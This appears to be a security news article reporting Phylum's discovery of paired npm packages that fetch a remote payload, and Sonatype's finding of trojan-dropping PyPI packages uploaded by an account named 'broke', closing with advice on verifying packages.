Security researchers with Phylum have uncovered an ongoing campaign that targets the npm ecosystem. The campaign, initially detected on June 11, utilizes a pair of published packages that work in tandem to fetch additional harmful resources.
How do packages work?
According to the supply chain security firm, it is critical that these packages are installed in a particular order for the success of the campaign.
- The first package is designed to locally store a token obtained from a remote server.
- The second package passes this token to acquire another script from the remote server.
- This returns a Base64-encoded string, "bm8gaGlzdG9yeSBhdmFpbGFibGU=", that is executed only if its length exceeds 100 characters.
However, researchers discovered that the endpoint has consistently returned the string which decodes to "no history available."
What does it mean?
- The aforementioned result suggests that either the attack technique is still a work under development or that the malicious payload has been timed for delivery.
- The other possibility is that it is dependent on the IP address from which the request (generated from the first package) is sent when generating the token.
The researchers have not attributed the attack to any specific threat actor but highlighted that it is a carefully orchestrated supply chain attack initiative. Moreover, the attackers have employed dynamic delivery methods for the subsequent payload to evade detection.
There are PyPI packages too
Cybersecurity firm Sonatype has further uncovered six malicious packages on the PyPI repository, uploaded by an account named "broke."
- Identified packages are broke-rcl, brokescolors, brokescolors2, brokescolors3, brokesrcl, and trexcolors - all target the Windows platform.
- Upon installation, they download and execute a trojan hosted on Discord servers.
- The firm also disclosed one package, named "libiobe", that targets both Windows and Linux platforms.
The bottom line
The emergence of malicious packages in the npm and PyPI ecosystems emphasizes the need for heightened vigilance and robust security measures to protect against the potential risks posed by these malicious packages. Developers, package maintainers, and users must remain diligent in verifying the integrity and authenticity of packages before installation.
Publisher
/https://cyware-ent.s3.amazonaws.com/image_bank/99c4_shutterstock_2117132213.jpg)
/https://cyware-ent.s3.amazonaws.com/image_bank/588d_shutterstock_2010923726.jpeg)
